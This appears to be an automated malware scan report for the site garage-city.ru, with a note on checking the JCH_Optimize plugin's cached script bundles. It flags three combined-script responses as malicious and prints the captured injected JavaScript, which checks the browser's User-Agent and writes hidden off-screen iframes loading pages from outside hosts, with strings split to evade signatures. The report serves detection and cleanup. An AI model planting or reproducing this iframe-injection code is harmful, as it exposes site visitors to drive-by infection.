Scanned pages/files
Request | Server response | Status |
http://www.garage-city.ru/ | 200 OK Content-Length: 28710 Content-Type: text/html | clean |
http://www.garage-city.ru/plugins/system/JCH_Optimize/jscss.php?f=28910921348407404324163cd4041350&type=js | 200 OK Content-Length: 20964 Content-Type: text/javascript | malicious |
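Malicious code - confirmed by antiviruses (see below). The script checks navigator.userAgent and, for the browsers it does not exclude, uses document.write to add a 138x138 iframe positioned off-screen (left/top -849px); the style and closing-tag strings are split across concatenations, which likely hinders simple signature matching. Excerpt as captured (the second copy of the function appears truncated):
function Argisuliterkas(){var dude=navigator.userAgent;var unificas=(dude.indexOf("Windows")<+1||dude.indexOf("Chrome")>-1||dude.indexOf("IEMobile")>-1);if(!unificas){document.write('<iframe src="http://raficavulerta.zombie-ink.ca/pendinoda15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');}} Argisuliterkas(); function Argisuliterkas(){var dude=navigator.userAgent;var artLoadEvent.add(function(){artButtonsSetupJsHover("art-button");});artLoadEvent.add(function(){artButtonsSetupJsHover("button");artButtonsSetupJsHover("readon");});
Antivirus reports: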
| ||
http://www.garage-city.ru/search?view=search | 200 OK Content-Length: 27621 Content-Type: text/html | clean |
http://www.garage-city.ru/plugins/system/JCH_Optimize/jscss.php?f=d6a83e92bc352fa38bd29eab3c07e553&type=js | 200 OK Content-Length: 13274 Content-Type: text/javascript | malicious |
Malicious code found. Script contains blacklisted domain: lardopasjet.cultura-tayrona.ch function Argisuliterkas(){var dude=navigator.userAgent;var unificas=(dude.indexOf("Windows")<+1||dude.indexOf("Chrome")>-1||dude.indexOf("IEMobile")>-1);if(!unificas){document.write('<iframe src="http://lardopasjet.cultura-tayrona.ch/minofosal15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');}} Argisuliterkas(); function Argisuliterkas(){var dude=navigator.userAgent;var unificas=(dude.indexOf("Windows")<+1||dude.indexOf("Chrome")>-1||dude.indexOf("IEMobile")>-1);if(!unificas){document.write('<iframe src="http://lardopasjet.cultura-t ...[3397 bytes skipped]... Decoded script: ...[9809 bytes skipped]... FadeDelay,transitionDuration:crossFadeSpeed,transitionText:CTRtransitionText,rotateAction:navTrigger,PlayText:fpssPlayText,PauseText:fpssPauseText,autoplay:autoslide,text_effect:CTRtext_effect,stop:false})}window.addEvent('domready',function(){if($('fpss-container')){setTimeout('init_fpss();',fpssLoaderDelay)}});function ppButtonClicked(){}function clearSlide(){}function showPrev(){}function showNext(){} <iframe src="http://lardopasjet.cultura-tayrona.ch/minofosal15.html" style="position:absolute;border-style:none;left: -849px;background-color:green;top: -849px;" height="138" width="138"></iframe><iframe src="http://lardopasjet.cultura-tayrona.ch/minofosal15.html" style="position:absolute;border-style:none;left: -849px;background-color:green;top: -849px;" height="138" width="138"></iframe> Malicious iFrame found. size: 138x138 src: http://lardopasjet.cultura-tayrona.ch/minofosal15.html This URL is marked by Google as suspicious <iframe src="http://lardopasjet.cultura-tayrona.ch/minofosal15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"> | ||
http://www.garage-city.ru/index.php?option=com_xmap&sitemap=1&Itemid=66 | 200 OK Content-Length: 32178 Content-Type: text/html | clean |
http://www.garage-city.ru/arendatory/ | 200 OK Content-Length: 32102 Content-Type: text/html | clean |
http://www.garage-city.ru/plugins/system/JCH_Optimize/jscss.php?f=3f8e357cbc5baec41ca52556e297f787&type=js | 200 OK Content-Length: 14750 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Same pattern as the Argisuliterkas script, under a different function name and host: a User-Agent check followed by a document.write of an off-screen 133x133 iframe (left/top -700px). Excerpt as captured (appears cut off after the first call):
function Teobromine(){var w=navigator.userAgent;var n=(w.indexOf("Android")>-1||w.indexOf("Chrome")>-1||w.indexOf("Linux")>-1||w.indexOf("Macintosh")>-1||w.indexOf("IEMobile")>-1||w.indexOf("FreeBSD")>-1||w.indexOf("iPhone")>-1||w.indexOf("iPad")>-1);if(!n){document.write('<iframe src="http://qiolkajet.xemphimnhanh.org/cubebacort15.html" style="posi'+'tion:absolute;left: -700px;top: -700px;" height="133" width="133"></ifra'+'me>');}} Teobromine(); func artLoadEvent.add(function(){artButtonsSetupJsHover("art-button");});artLoadEvent.add(function(){artButtonsSetupJsHover("button");artButtonsSetupJsHover("readon");});
Antivirus reports:
| ||
http://www.garage-city.ru/arendatory/22a-133 | 200 OK Content-Length: 26736 Content-Type: text/html | clean |
http://www.garage-city.ru/plugins/system/JCH_Optimize/jscss.php?f=15238108fcbc520b26f51da91955c3dd&type=js | 200 OK Content-Length: 20969 Content-Type: text/javascript | clean |
http://www.garage-city.ru/arendatory/22avtotehnolodzhi33 | 200 OK Content-Length: 26697 Content-Type: text/html | clean |
http://www.garage-city.ru/arendatory/22avtotreiyd-m33 | 200 OK Content-Length: 26567 Content-Type: text/html | clean |
http://www.garage-city.ru/arendatory/22akorn-sb33 | 200 OK Content-Length: 26483 Content-Type: text/html | clean |
http://www.garage-city.ru/plugins/system/JCH_Optimize/jscss.php?f=28910921348407404324163cd4041350&type=js&gz=gz | 200 OK Content-Length: 6560 Content-Type: text/javascript | clean |
http://www.garage-city.ru/arendatory/tehcentr-22vyhlop33 | 200 OK Content-Length: 30390 Content-Type: text/html | clean |
http://www.garage-city.ru/arendatory/22avto-draiyv33 | 200 OK Content-Length: 27783 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: garage-city.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: garage-city.ru
Referer: http://www.google.com/search?q=garage-city.ru
Result:
The result is similar to the first query. No suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=garage-city.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://garage-city.ru/
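Result: garage-city.ru is not infected or malware details are not published yet.
Note: a "not listed" blacklist result does not contradict the scan above, which flagged three script responses as malicious. The injected scripts only write the iframe for certain User-Agent strings, so a blacklist crawler may not observe it. All three flagged responses come from the JCH_Optimize combined-script endpoint (jscss.php), so both the plugin's cached bundles and the source scripts it combines should be checked.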